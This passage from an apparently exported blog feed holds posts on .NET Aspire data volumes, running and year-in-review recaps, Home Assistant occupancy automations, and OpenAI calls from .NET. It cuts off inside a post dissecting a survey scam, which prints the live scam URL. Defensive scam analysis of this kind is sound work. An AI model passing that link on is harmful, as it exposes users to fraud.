pretty easy fix - all that you need to do is mount a volume into the container where it would store it’s data.\nHere’s the PostgreSQL example:\n1 2 3 4 5 6 7 8 IResourceBuilder<PostgresContainerResource> postgresContainerDefinition = builder.AddPostgresContainer(); if (builder.Environment.IsDevelopment()) { postgresContainerDefinition // Mount the Postgres data directory into the container so that the database is persisted .WithVolumeMount("./data/postgres", "/var/lib/postgresql/data", VolumeMountType.Bind); } And here’s the Azure Storage example:\n1 2 3 4 5 6 7 IResourceBuilder<AzureStorageResource> storage = builder.AddAzureStorage("azure-storage"); if (builder.Environment.IsDevelopment()) { storage.UseEmulator() .WithAnnotation(new VolumeMountAnnotation("./data/azurite", "/data", VolumeMountType.Bind)); } With this I’m mounting the ./data/<service name> folder from within the AppHost project into the respective data paths, but also wrapping them with a builder.Environment.IsDevelopment() check so that it only happens when running locally (since you don’t want to mount volumes in production - we’ll use the Azure services for that).\nNote: The Azure Storage emulator doesn’t have a WithVolumeMount method, so we have to use the WithAnnotation method, which is what the WithVolumeMount method wraps anyway. Also, due to this pull request it’s likely there’ll be an easier way come Preview 3, where you provide the ./data/azurite path as part of the UseEmulator method.\nNow when I restart my app, the data is persisted, meaning I don’t have to rebuild state each time. 
Just make sure you put those paths in the .gitignore file so that you don’t accidentally commit them to source control!\n", "id": "2024-01-23-persisting-data-volumes-with-dotnet-aspire" }, { "title": "2023 a Year in Review", "url": "https://www.aaron-powell.com/posts/2024-01-09-2023-a-year-in-review/", "date": "Tue, 09 Jan 2024 03:36:14 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, I’m early this year (well, compared to my 2022 post)!\nAdmittedly, part of my was somewhat apathetic towards writing this post, mostly because I’m not sure that I have much “interesting” stuff from 2023 to share. But given that I’ve been doing this style of post consistently since 2017 (and sporadically prior to that), I figured I’d just start typing away and see what comes out.\nBlogging Over the past few years I’ve had a decrease in the number of posts I’ve written here, partially because I’ve been burnt out (see below), but partially because I haven’t felt that I’ve had much “interesting” stuff to share.\nThere were 22 posts that I wrote last year (ls -l | grep -c "^2023- did the count, thanks GitHub Copilot CLI 😜), but generally speaking, they are part of series that were either ongoing (9 about my smart home journey and 2 about GraphQL) or a new series that I kicked off around Generative AI.\nI’m not entirely sure if this is something I expect will change come 2024, maybe I’ll move away from the large (or as my wife would say meandering) blogs that I tend to write and do more short and sharp ones about narrow problem spaces. Or maybe I’ll just get GenAI to write more posts for me, that’s one way to turn the content wheel!\nPresenting and Conferences With the way my role is currently positioned conferences aren’t as big a thing as they once were, so with that I’ve been very selective on what events I’ve been submitting to, and as a result I only gave three talks last year at conferences, with the one I was most proud of being the keynote for DDD Adelaide in which I shared my career as a public speaker and the role that DDD had played in that.\nImage from Lars\nI’m a bit sad that this talk wasn’t recorded because it’s probably the talk I’m most proud of giving for a while, but maybe I can convince the organisers of other DDD’s in Australia that it’d be a good talk to have 😜.\nRecovering from burnout Before I wrote my last year in review post I wrote a post about burnout. That was a post that I wrote somewhat spur of the moment, didn’t review and just hit publish - it was just something I needed to get off my chest.\nThe response I got from that post was very heartwarming. I had dozens of people reach out publicly and privately to offer their support and share their stories. It was a very humbling experience and I’m very grateful for the support I received.\nI’m happy to say that I’m in a much better place now than I was when I wrote that post, and a lot of that I credit to the support I received in Cloud Advocacy to tackle what I wanted, which was to move to the .NET team. 
After I wrote the post our GM reached out to me to discuss next steps (I hadn’t told any of my management chain that I was writing that post, I just did it - maaaaaaaybe not the best move but it was still what I needed to do), and we agreed that I’d move to the .NET team.\nAnd while, as I noted in last years post, there is a bit of irony that managerial change was a large factor in my burnout and my solution was to get a new manager, the decision was very worthwhile. I’m now working with a team that I feel is a better fit for me, and I’m working on things that I’m more passionate about.\nAI Would it come as a shock to anyone if I said that AI was something that became more and more important to us at Microsoft throughout 2023?! 😜\nIn the first half of the year our team was trying to work out just what would it mean for the .NET on Azure CA team to be involved in AI and our manager was looking for who would lead it. I very much said no, I’ve seen enough fads come and go and I didn’t want to be on the AI hype train.\nWell, I’m now leading the AI efforts for the .NET on Azure CA team 😅.\nSo, what changed? Well, we had a talk that needed to be given as a “Beginners guide to Generative AI for .NET” and I found myself with a bit of bandwidth to do it and I figured that I’d give it a go. With that I started digging more into it, we had some more asks come up from partner teams, and over the next six months I found myself getting more and more interested in it.\nI’m still not sure if I’m on the AI hype train, but I’m definitely on the AI train and I’m enjoying the ride. I’ve had the opportunity to build some really fun demos, and I’ve got a few more projects in the works for 2024 that I’m really excited about.\nAnd with that, let’s bring on 2024.\nOnly some of this post was written by AI - GitHub Copilot + Markdown is awesome!\n", "id": "2024-01-09-2023-a-year-in-review" }, { "title": "1645km", "url": "https://www.aaron-powell.com/posts/2024-01-01-1645km/", "date": "Mon, 01 Jan 2024 00:19:39 +0000", "tags": [ "running" ], "description": "The story of my 2023 running journey.", "content": "Well, it was a goal of 1500km, just like in 2022 but again I’m gone and exceeded my plan.\nAnd as is becoming tradition, it’s time for me to reflect on the year that was in running and see what I’ve accomplished and what I’ve learned.\nThe raw stats Using my Strava profile as the source of truth (for running only, I did track some activities such as walking, gym and stand up paddle boarding), here’s the raw stats for the year:\n1,645km distance ran 133 hours and 56 minutes spent running (5 days, 13 hours and 56 minutes) 10,909 meters of elevation gain 223 activities logged 109 PB’s, 3 King of the Mountains and 3 Local Legends This is just under 100km further than last year, which surprised me as I hit my yearly goal at the end of November - so nearly a month early, and almost 2000m less elevation (12,719m was last year), again which surprised me.\nMy peak month was July with 182km covered, which tracks as that was the pointy end of training for City2Surf again.\nInjuries and surgery I started off 2023 with a slight calf injury as I chased the 👑 on two Strava segments at the end of 2022, but I wasn’t wearing good shoes for speed and that was not the best plan. But hey, I got the #1 spot, so it was worth it right 🤣.\nOtherwise, 2023 saw me mostly injury free. 
There was a minor niggle around City2Surf which turned out to be an overly tight ITB, but I was able to run through it.\nA lot of this injury-freeness I attribute to the fact that I kept up with my gym program the physio had me start, but I’ll cover that when I get to the training section.\nThe main reason I had a down period this year was having surgery on my right leg.\nSurgery For as long as I can remember I’ve had obvious varicose veins down my right calf. I’m not a vain person (ha!) so it hasn’t bothered me and I don’t get any pain from them so it was something I generally ignored. But after the injuries over the past few years I decided to get them looked at as I thought they might be related (they aren’t).\nI saw a surgeon in January and, to quote them, “those are some huge veins”. Since I don’t have any symptoms other than the visual ones, large veins and an increased diameter in both calf and ankle, surgery was considered optional but given I’m young, fit and in a financial position for it, I went under the knife in March.\nThis saw me out of running and the gym for a few weeks, but within a month I was back to easy running and within six weeks I was back to full training. Honestly, I was shocked at how much of a non-event it was to have had a vein the full length of my calf removed (plus a few other small ones), but since they are just surface-level ones they are seemingly not needed.\nBecause of the timing of this I skipped the May half marathon in Sydney, as while I’d be back to running for it I wouldn’t have had much training time, and given how last year went at that one I would prefer to train for it properly.\nRaces I set me sights on two races instead, City2Surf and the Sydney Marathon 21.1km (so… the Sydney Marathon Half Marathon 🤦) which was formerly the Blackmores half marathon.\nTraining Since there was only about six weeks between City2Surf and the Sydney Marathon 21.2km I was going to have to rely on the the training done for City2Surf as the base for the half marathon. This meant I had to be a bit more strategic with my training, but with the timing of the surgery in the end of March it was going to work out well for a slow build up and having consistency in my training.\nI stuck with a similar training program to last year:\nWednesday workout - this was a fortnightly rotation of speed and hills. For hills, I kept pretty consistent on the 3.5km undulating loop at a local park (building to two then three reps) while speed rotated between 400m and 1k distances on flat, generally with floats between, before finishing off with a tempo run, generally netting 10km per workout. Friday gym - I kept up with my gym program from the physio, which was focused on leg strength, but added a few core workouts to it as well as I have very poor core strength (the joys of being tall, skinny and inflexible). The program was 3 sets of 10 reps of each exercise, consisting of leg press, lunges, leg curls, step ups, calf raises, plank (1 min), squats, and situps. For the weighted exercises I kept the weights low-ish, I don’t think I even hit body weight, since I was more focusing on small building up and not trying to get huge. I’d also jog to/from the gym which would add about 5km to my running week. Saturday parkrun - gotta have parkrun in there. My wife was injured much of the start of the year so she wasn’t doing parkrun too, which gave me an excuse to not run with the pram (yay!) and where possible I’d run to/from which would take the 5km to 11km. 
Sunday long run - more often than not this would end up closer to tempo than “long and slow”, but I’ve come to the conclusion that it’s better for me to run at a pace that feels comfortable than to try and force myself to run slower. I’d generally aim for 15km. As a general rule of thumb I wanted to run 30km per week, and then with the training ramping up I wanted to hit 40km come June and peak at 50km in July (by adding another run to my week) before tapering off for City2Surf.\nThis didn’t quite go to plan as part way through June I felt my calf starting to strain so I eased back, peaking around the 45km mark in July.\nCity2Surf I had another cracking outing at City2Surf this year with another PB (57.13), which seemed pretty on-point for where I’d been training-wise. Maybe if I hadn’t had the minor setback and been able to hit my 50km-per-week goal I could have pushed for a sub-57, but I’m not too fussed.\nGoing into the race I felt pretty good, with one exception - don’t have a pizza with chilli on it the night before a race. Yeah… the bathroom queues at the start were long and I decided to skip them, but clenching for 14km is not fun 🤣.\nThe race went pretty much to plan, I started at the back of the pack as planned, found my groove moving through the thousands in front of me and was able to hit my stride as the pack thinned out. I kept the pacing pretty consistent, low 4minutes for the undulation and hitting high 3minutes for the downhill and flat sections. The fact that Strava says I got my 10km PB during the event is pretty crazy!\nI generally felt pretty strong out there, again a good testament to my training. I caught a friend at about 12km and gave some “gentle” encouragement (I thought you said you were racing this? 🤣) before leaving him for dead (he did run like a 58 and had run like 7km to the start plus was running home).\nAfter finishing I headed to the pub for a few celebratory beers, nothing like drinking before 9am on a Sunday, before heading back to get the bus up to the trains, only to find around 10,000 people in the bus queue and deciding that “hey, I can totally run the 2.5km uphill to the train station” which was totally a good idea at the time.\nI had booked a physio appointment for the Monday morning as I’d been having knee/quad pain in my right leg in the few weeks leading up, which weirdly disappeared after running City2Surf. The physio was equally baffled but it was clear that my ITB was tight, and the likely cause, so I was given some exercises to do and told to keep up with the gym work, so I could get through to the next race.\nSydney Marathon 21.1km I’m going to start off by saying that I was not a fan of this event. I’ve run the Blackmores half marathon a few times, it’s always been my favourite course - beautiful scenery, some hills at the start and then a dead flat back third. But this year the organisers decided they want to be part of the Abbots World Marathon Majors and for that the only thing that matters is the marathon distance, which was made very clear in the lead up to the event. We had the course changed from a city loop to out-and-back to Centennial Park, the start time was super early (before 6am), cut-off was dropped to 2.30 hours and we didn’t even get to finish at the Opera House. All of this meant I went to the event with a sour mood and aimed to just get it done.\nThe results obviously speak for themselves, I had a very good race resulting in a new PB at 87.08.\nBut this was a really mentally tough race. 
The start was really congested, as we only had 10 minutes to cross the start line (the few thousand that was doing this event) which meant that you were running very bunched up until hitting the Harbour Bridge where everyone spread out. Hitting Oxford street was really tough as I was already running in a thinning pack and there was no one supporting on course, so it was just a long, straight, uphill slog. I passed a pacer at about 8km and thought it was the 95 minute, so going into Centennial Park I was waiting to see the 90 minute pacer, but the next one I saw was the 85, and I realised there wasn’t a 95 and I was already running ahead of where I was aiming to be, whoops!\nThe return out of Centennial Park was a fair slog, I was mostly running solo and I felt bad for the folks running the other direction as it was packed - the road was only one car width (plus a bit of shoulder) so there wasn’t a lot of space and I just felt bad for all the people running it.\nAs we hit the downhill of Oxford street I was struggling mentally, there was only a few people I could see in front of me (we were pretty thinned out) and there was no crowds to speak of. When I hit 16km I said to myself “only a parkrun to go, 21 more minutes” and then saw a lone spectator with a sign saying “One parkrun left” and that made me smile and cheer back to them.\nFor the final few km we had Lady Macquarie Chair to run down and up from and this was something I was not looking forward to. I caught a glimpse of the 85 minute pacers again and judged they were about 2 minutes ahead of me. Since there was an uphill to go I wanted to hold that gap. I looped the end and looked out for the 90 minute pacers coming the other way and I saw them at about the same spot I was at when I’d seen the 85, meaning I was sitting around what would get me 87 minutes (yes, I could have looked at my watch but I don’t like doing that in races, I prefer to run by feel). So with the final push I was able to hold the spot I was at and finish with a new PB of 87.08, but the really exciting one for me was finish 86th (75th male), can’t complain about a top 100 finish!\nParkrun I didn’t do a whole lot of “racing” parkrun this year as I tended to stick it in the middle of a long-ish run, so it was more a tempo workout than anything. But what I did notice as training was getting underway was that I was able to run it harder for the same amount of effort. I ran 3 sub-20 St Peters parkruns this year which nearly doubled the number of times I’d run sub-20 there, and I had a few others that were close to it. In fact, for my last hit-out at St Peters this year I ran a PB of 19.11, which did feel like a 19.11, but mostly because my wife was tail walking with the kids and she said I had to run hard to come and pick them up from her - so I did 😅.\nBut the main parkrun goal I’ve had for myself was to break 19 minutes. Last year at Mudgee I ran 19.19 on a freezing cold day so I know in the right conditions I should be able to, but even shaving 20 seconds off would be a struggle, that’s 4s per km average.\nDuring the October school holidays we were camping down at Huskisson and I decided to do the Huskisson parkrun. I’d heard it’s a fast course, pretty much flat out and back, so I thought I’d give it a crack. I packed some of my faster running shoes, not the carbon-plated ones, but ones with a ridged plate in them.\nWell, I did it! Official time of 18.51 (although I like my watch time better 😜). It was pretty tough though. 
At around the 3km mark I tried to pass someone who I’d been sitting on the heals of, pulled up beside them and realised I wasn’t going to be able to hold on to the pace they were running (they ended up about 20s ahead of me at finish) so I went back to trying to find my groove and not crash and burn.\nThen at the start of December when we were up at Coffs Harbour and doing parkrun I decided to give it another crack. It was another nice morning and I was feeling good, so I went hard and was able to pull a 18.57! So, now I’m ready to retire 😁 (or maybe I can do a sub-19 St Peters after all).\nWrapping up 2023 has been another good year for my running. I’m finding my groove when it comes to training, both running and strength, that sees me avoiding much in the way of injury.\nI’m happy with how my races have gone, even if the half marathon I had my sights set on was a bit of a let down (from an experience, not an outcome) - I’m not sure what I’ll do next year regarding this race, I have no desire for the full marathon and I’m not sure if they’re going to run a half marathon again.\nI’ll probably be more relaxed in the goals as my wife is hoping to do her first marathon in 2024, so I’ll be supporting her in that. Maybe I’ll find a 10k and finally have an official sub-40 time.\nBut for now, I’m going to enjoy the rest of the holidays and get ready for 2024.\n", "id": "2024-01-01-1645km" }, { "title": "Building a Smart Home - Part 14 Motion, Occupancy, and Presence", "url": "https://www.aaron-powell.com/posts/2023-12-03-building-a-smart-home---part-14-motion-occupancy-and-presence/", "date": "Sat, 02 Dec 2023 22:03:57 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Walking into a room, lights turning on, feels like magic.", "content": "For the last six months I’ve been adding to my smart home the thing that makes it feel really futuristic, lights that turn on as you enter a room and then off when you leave. I’ve realised that I’ll go weeks without really using a light switch, at least not in our main living spaces as a result of this.\nSo, let’s look at the three components to this, movement in a room, people being in the room and who specifically is in the room, aka, motion, occupancy and presence.\nPresence Let’s start with presence, as I think this is the most interesting, but it also the one I’m not actively using anymore.\nPresence is interesting because everyone has subtle differences in the way they like things to behave. In our house, I am quite happy with the ambient light that comes in through our windows, especially in our kitchen/living downstairs, whereas my wife is more inclined to turn the lights on in situations I’d deem “adequate light levels”. In this case, presence can be useful to know who is in the room and adjust the lighting to meet the preferences of the people there, but that does require knowing who is in the room.\nThere’s a great project, ESPresence that can be used for this. It uses the Bluetooth signals from devices to map what’s detected to an individual, done using ESP32 devices.\nI have a bunch of ESP32’s in a draw just looking for a project, so I decided to give it a go, after all, my wife and I both have our phones on us most of the time as well as our Garmin watches, so we’re emitting Bluetooth signals all the time.\nUnfortunately I couldn’t get it to work as well as I’d like. 
It turns out that Garmin doesn’t broadcast Bluetooth signals as frequently as I’d need for capture (which is probably a good thing), and to use our phones, since we’re on Android, you have to enable a feature in the Home Assistant mobile app which has a negative impact on battery life - impactful enough in my testing to be undesirable.\nSo I’ve decided to ditch presence detection for the time being, but if you want to see it in action, here’s a good video about setting this up.\nMotion Let’s talk about stuff that actually works, first up is motion detection. For this, I’m using passive infrared sensors, or PIR sensors for short. You’ve likely come across PIR sensors quite frequently, ever been in an office meeting room and had the lights come on when you enter? That’s most likely a PIR sensor.\nPIR sensors are great because they’re cheap, I have a bunch that use ZigBee (they report as ZG-204ZL but never report an illumination value so they may be misidentified), meaning they run off a coin cell battery and I can mount them anywhere.\nThe other great thing about PIR sensors is they are fast. They detect motion almost instantly, so you can have lights come on as you enter a room without having to wait for them. For example, I have one at the top and another at the bottom of our stairs, so when I’m going up or down the stairs, the lights come on.\nThe downside to PIR sensors is that they’re not great at detecting if someone is still in the room. Again, this is probably something that you’ve come across in an office meeting room, you’re sat in a meeting and the lights go off because you’ve not moved enough. Not really ideal when you’ve got a living space where the lights came on as you entered, then you are chilling on the couch and the lights go off (yes, that happened, no, my wife wasn’t amused).\nOccupancy Since PIR sensors won’t detect that you’re sitting still, or at least mostly still, we’re going to need something to detect occupancy - whether or not someone is in the room at all, rather than who specifically is there.\nFor this, I’m using mmWave radar sensors. This isn’t exactly new technology but it’s really only in the last few years that it’s become affordable for hobbyists.\nWhat makes these sensors different is that they are able to detect very minor movements, such as breathing, so they’re great for detecting if someone is in a room, even if they’re not moving. There are two main drawbacks of these sensors. The first is that they aren’t as fast as a PIR sensor, so you can’t use them to turn lights on as you enter a room, you’d have a noticeable lag and you’d find yourself going for a light switch. The other drawback is that they detect any movement in the area they cover, and that could be a fan spinning rather than a person, giving “false positives” (or false occupancy in this case, since it’s correctly identified movement but we really only care about human movement).\nI have two different mmWave devices, the first one I got was the EP1 which combines a PIR and mmWave (plus a few other sensors), and the others are Screek Workshop 2A which is just mmWave (and illuminance).\nEP1 vs 2A Both devices are ESP32 based so they integrate into HA very easily using ESPHome, making setup a breeze. The EP1 is a bit more expensive, but it has a PIR sensor, so it’s faster to detect movement, and this is a huge positive if you’re wanting to do “lights on when you enter”. 
On the other hand, the 2A has a really complex zone management feature, capable of detecting up to three targets across three zones (which the EP1 originally couldn’t do, but now can with a firmware update, I just haven’t tried it out).\nI do also find the 2A to be a bit more sensitive, so it’s more likely to detect movement, but that’s not necessarily a good thing, especially if you’re trying to avoid false positives, which see automations firing when they shouldn’t (or having complex conditional logic to avoid that). But they are a much slimmer design (due to the lack of PIR) so they can be hidden away a bit easier - I have two mounted behind couches in different rooms so that they detect you sitting on the couch but it’s not “in your face”.\nGenerally speaking, I’d go EP1 as the primary device and then use 2As as extenders or for more nuanced scenarios.\nHome Assistant tips These sensors aren’t much use unless they’re integrated into HA, so here are some tips that I’ve got from having them set up in our house.\nOccupancy zone Our downstairs living is made up of three “areas”, kitchen, dining and living, which are arranged in an L shape, with the hallway coming in between the kitchen and dining. I wanted to be able to detect someone entering from the hallway and if it’s dark, turn the light on, but I then want it to stay on if someone is in the zone, even if they’re not moving (say, sitting on the couch watching TV).\nBecause of the unusual shape of the room I have three sensors in there, a PIR covering the dining area, an EP1 in the kitchen and a 2A behind the couch. The reason for this is that the best mounting point for the EP1 is in the kitchen facing towards the hallway, but that also meant that there was a dead zone in the dining and the lounge didn’t have any coverage at all.\nFor this, I created a binary group helper in HA called binary_sensor.occupancy_living_room that all the sensors are in, and if any of them report as “on” then the group is “on”. I then use this group in my automations to determine if someone is in the room.\nI’ve used a similar pattern with our stairs, having a PIR at the top and bottom, but a group which is “on” if either of them are on, so that if you’re going up or down the stairs, the lights stay on.\nAutomations The automations with this are pretty simple, if someone enters a room, turn the lights on. For detecting the “entering” part, it’s best to trigger on the PIR directly rather than the occupancy group, because mmWave sensors are slower to detect movement, but also can report more false positives, as mentioned above, so you can find lights being on at incorrect times as a result.\nFor the “leaving” part, I use the occupancy group with a timeout. In the main living zones I use a 5 minute timeout, but on the stairs and our WIR I use 30 seconds, since they are transient areas and it’s unlikely that you’re in them for more than 30 seconds without moving.\nAlso, since we have a cat who tends to walk around the house at all hours of the night, it’s important to have a way to cater for that. While the cat doesn’t trigger the mmWave sensors (although there are other things that weirdly do which I can’t figure out) she does trigger the PIR sensors. Because of this, I disable the automations when our “end of day” routine runs and then re-enable them in the morning at 5.30am (which is when one of us is getting up to go to the gym/for a run/etc.).\nMedia Room I’ve started to experiment with a slightly more complex media room setup. 
In here I have a PIR and mmWave (Screek 2A), so the lights come on when you walk into the room and stay on while you’re there watching something. But here’s the thing about watching a movie, you’ll often sit pretty still and I found that the 2A would detect that as no movement and turn the lights off, which is not ideal. So I’ve added a condition to the automation that if the TV is on, the lights stay on, even if there’s no movement.\nHere’s that automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 alias: "Lighting: Media Room off" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_media_room to: "off" for: hours: 0 minutes: 5 seconds: 0 condition: - condition: or conditions: - condition: state entity_id: media_player.media_room_tv state: idle - condition: state entity_id: media_player.media_room_tv state: "off" action: - service: light.turn_off data: {} target: entity_id: - light.media_room_light - light.media_room_downlights - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.override_media_room_occupancy mode: single You’ll also notice that there’s a input_boolean.override_media_room_occupancy in there. This is used to manually override the occupancy detection, so if you manually turn the lights off then this is set to true and the “lights on when movement detected” won’t trigger until you turn off the TV and leave the room (which seems like a logical “we’re done” condition).\nDirection of travel When you go up our stairs and it’s “dark”, it’s quite logically that you’re next going to want the lights on the landing turned on, so I decided to experiment with creating a “direction of travel” value for our stairs. While I don’t use this anymore since the mmWave sensor was added up there, I thought it might be of interest to others.\nTo start with, I created a template sensor:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 - sensor: - name: "Stair direction of travel" unique_id: stair_direction_of_travel icon: mdi:stairs state: >- {% if is_state("binary_sensor.stairs_bottom_occupancy", "on") and is_state("binary_sensor.stairs_top_occupancy", "on") -%} {% if states.binary_sensor.stairs_bottom_occupancy.last_changed > states.binary_sensor.stairs_top_occupancy.last_changed -%} down {%- else -%} up {%- endif -%} {%- else -%} none {%- endif %} Here we look at the state of the two PIR sensors and when they are both on we determine which one was triggered last and set the state of the sensor to either “up” or “down”. If only one is on, or neither are on, then the state is “none”.\nThis can be combined with an automation to turn the lights on when you enter the stairs, but only if you’re going up:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 - id: "1688545254314" alias: "Lighting: going upstairs " description: "" trigger: - platform: state entity_id: - sensor.stair_direction_of_travel to: up condition: - condition: sun after: sunset - condition: time before: "19:00:00" - condition: and conditions: - condition: state entity_id: light.kids_lounge state: "off" - condition: state entity_id: switch.upstairs_hallway state: "off" action: - service: light.turn_on data: {} target: entity_id: light.kids_lounge mode: single Conclusion I’ve found that having lights come on as you enter a room and then turn off when you leave to be a really nice feature of our smart home. 
It’s one of those things that you don’t really notice until you don’t have it anymore, and then you realise how much you miss it. I’ve found myself walking into rooms that don’t have this and just standing there waiting for the lights to come on, only to realise that I need to turn them on myself, like a caveman!\nUsing a combination of PIR and mmWave really is the way to go when it comes to motion and occupancy. I do with my PIR sensors would detect LUX so that I could use them for illuminance as well, but that’s not a huge deal, just means that sometimes the lights are coming on when I don’t need them to.\nThe EP1 is really my pick of the devices, my only real complaint is that it’s a bit bulky and clearly stands out when mounted, but it’s something you “get used to”.\nI do wish I could get ESPresence working reliably, but I’m not sure that it would really improve things that much in our setup.\nIt’d be really cool to see how this can be applied in the bedrooms to do automatic bedtime routines for the kids/end of day triggering, but I feel like it’d be really hard to get right, and you don’t want lights coming on in the middle of the night in a bedroom!\n", "id": "2023-12-03-building-a-smart-home---part-14-motion-occupancy-and-presence" }, { "title": "Generative AI for .NET - Part 5 Streaming", "url": "https://www.aaron-powell.com/posts/2023-10-29-generative-ai-for-dotnet---part-5-streaming/", "date": "Sun, 29 Oct 2023 23:34:22 +0000", "tags": [ "dotnet", "ai" ], "description": "Let's get responses to the client as fast as we can.", "content": "When we explored Chat Completions in Part 3 we used the asynchronous API to call our model, but it’s still somewhat a blocking call in that we wait for the model to generate a response before sending to the client. This is how we would traditionally get data back to a client from a data source, since the data source we’re requesting from, like a database, will have all the data we need, it just has to “find it”. But when working with an LLM, it’s a bit different, we’re generating the data (response) on the fly, and depending on the complexity of the model, it can take a while to generate a response - and the longer it takes to generate, the more likely the user is going to assume something has been unsuccessful.\nStreaming Response Enter streaming responses. This is the experience that you’re more likely to be familiar with using tools like ChatGPT, Bing Chat, GitHub Copilot Chat, and so on. It’s where you receive the response back in chunks, as they’re generated, rather than waiting for the entire response to be generated before sending it back to the client.\nFor a streaming response we will call the GetChatCompletionsStreamingAsync method on our OpenAIClient object, which returns a Response<StreamingChatCompletions>. From here, everything is asynchronous iterations, which we can use the await foreach to step through:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 IAsyncEnumerable<StreamingChatChoice> choices = completions.Value.GetChoicesStreaming(); await foreach (StreamingChatChoice choice in choices) { IAsyncEnumerable<ChatMessage> messageStream = choice.GetMessageStreaming(); await foreach (ChatMessage message in messageStream) { string content = message.Content; Console.Write(content); } Console.WriteLine(); } First, we’ll iterate over the IAsyncEnumerable<StreamingChatChoice> which will give us each StreamingChatChoice that has been returned from the model. 
Remember, this defaults to one, but you can request a higher maximum, although that doesn’t guarantee you’ll get more than one.\nAs we iterate over the StreamingChatChoice we request a message stream using GetMessageStreaming that returns an IAsyncEnumerable<ChatMessage>. Iterating over this IAsyncEnumerable gives us each message chunk back from the model, from which we can extract the content and send it to the client. Each chunk only contains the content generated since the previous chunk, so our client will need to treat it as an append operation, not a replacement, which is why I’m using Console.Write here to continue on from the last point in the console.\nLet’s see our notebook sample in action:\nHere you see the chunks getting written out as they come back from the model. It’s worth noting that the response times are non-deterministic, so it could be that it’s very quick, as is the case in the above demo, or it might take a whole lot longer if the response is a lot more complex to generate.\nConclusion That’s it, we’ve seen how we can use streaming as an alternative way to get the response back from our model and send it to a client - a simple Console.Write statement in this case. The way you send the stream to the client will depend on what kinds of clients are being supported, but some options to consider are using web sockets (Azure SignalR Service is a good option there) or chunked HTTP responses.\nNext time we’ll start delving a bit more into aspects of prompt engineering and how we can use that to get better responses from our models.\n", "id": "2023-10-29-generative-ai-for-dotnet---part-5-streaming" }, { "title": "Generative AI and .NET - Part 4 Images", "url": "https://www.aaron-powell.com/posts/2023-10-06-generative-ai-and-dotnet---part-4-images/", "date": "Fri, 06 Oct 2023 03:58:48 +0000", "tags": [ "dotnet", "ai" ], "description": "Everything is better with visuals.", "content": "After text generation the most common thing you’re likely wanting to generate with an LLM is going to be images. We’ve all seen those awesome images generated with Midjourney, Stable Diffusion, DALL-E, and others. In this post we’ll look at how to generate images with .NET and an LLM, specifically the DALL-E models from OpenAI. We’ll use DALL-E 2 because at the time of writing DALL-E 3 isn’t available, but I anticipate that it will work the same from a .NET perspective.\nCalling the API Since the DALL-E models are part of the OpenAI LLM family, we’ll use the same OpenAIClient class that we used in the previous posts in this series, with the only difference being the method that we call, GetImageGenerationsAsync.\n
string prompt = "A painting of a cat sitting on a chair";

Response<ImageGenerations> response = await client.GetImageGenerationsAsync(new ImageGenerationOptions
{
    Prompt = prompt
});

ImageGenerations imageGeneration = response.Value;
Uri imageUri = imageGeneration.Data[0].Uri;

Console.WriteLine($"Image URI: {imageUri}");
\nReally, it’s just that easy.\nImage Generation Options With the ImageGenerationOptions class we’re able to control some aspects of the image generation process. The options are:\nImageCount: how many images you want back (defaults to 1 but you can get up to 10).\nResponseFormat: do you want a URL to the image or a base64 encoded string of the image (defaults to URL).\nSize: how big an image do you want from the options of 256, 512, or 1024 (defaults to 1024). Note: Images are always square.\nUser: a unique identifier for the user who the image is generated for. 
This isn’t needed and will default to nothing, but OpenAI uses it to monitor for abuse, so if you’re creating an app where anyone can generate an image, it could be useful to include. What you’ll notice is that you don’t have some of the other controls that we had when doing text generation, around things like Temperature and TopP. This is because these properties are used to influence how the model would generate the next token (word) in the sequence for the completion, but since we aren’t dealing with a text output there’s no need for them.\nConclusion That’s it! It’s really that easy to generate images with .NET and an LLM.\nAnd yes, the banner image for this post was generated with AI (I might have cheated and used the newly released DALL-E 3 model via Bing Create) using the prompt I need a banner image for a blog post about generating images with AI. Make something creative and abstract.\n", "id": "2023-10-06-generative-ai-and-dotnet---part-4-images" }, { "title": "Oh Look a Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2023-09-20-oh-look-a-phishing-attempt/", "date": "Wed, 20 Sep 2023 04:06:20 +0000", "tags": [ "security" ], "description": "It seems to be my lucky day, I've gotten about a dozen of these in the last 24 hours.", "content": "A little over a year ago I wrote about dissecting some phishing attempts and while I still got the odd one here and there, nothing really was slipping through the M365 spam filters.\nUntil yesterday that is. Over the last 24 hours I’ve gotten around a dozen phishing attempts to one of the sub-addresses on my domain, and given that there was so many I figured I’d take a look at them.\nTaking it apart The first thing I noticed about this one is that it had gotten through my spam filter, and when I opened the email I could see why, the email wasn’t a text-with-image email, it was a HTML email with a single image in it.\nSince that is just a large image in the email body, and with no alt-text, there’s nothing for the spam filter to scan for, without it doing OCR. Also, it’s surprisingly lacking in spelling mistakes, which are a really easy way to catch these things. It is worth noting that the image wasn’t displayed initially, I had to tell Outlook to allow the image to be displayed for an untrusted email address.\nWhere to next Unlike the last ones which had you download a HTML file and then it was all done locally, this linked me off to an external website. Here’s the address http://allallaossn.lat/cl/5394_d/6/72997/137/35/77720 although you probably shouldn’t click on it, unless you want to go digging yourself. The address bounced through a few other locations, presumably setting some cookies or capturing other bits of info about me, and then it landed me here:\nInterestingly enough when I opened it in Chrome I ended up at a different page with a different survey pipeline:\nI’m going to stick with dissecting the Edge version, as that’s what I started with. It’s also worth noting that while I expected this to be a standard phishing attempt, it’s actually a survey scam, which is a little different. The goal of this is to get you to complete a survey, and then you get a prize. The prize could be a lot of different things (we’ll see my prizes later on), but the goal of this scam is to get you to subscribe to a paid service that is really hard to get out of.\nThe page make up I opened up the source of the page and it turned out that it doesn’t really contain any HTML, just some JavaScript includes. 
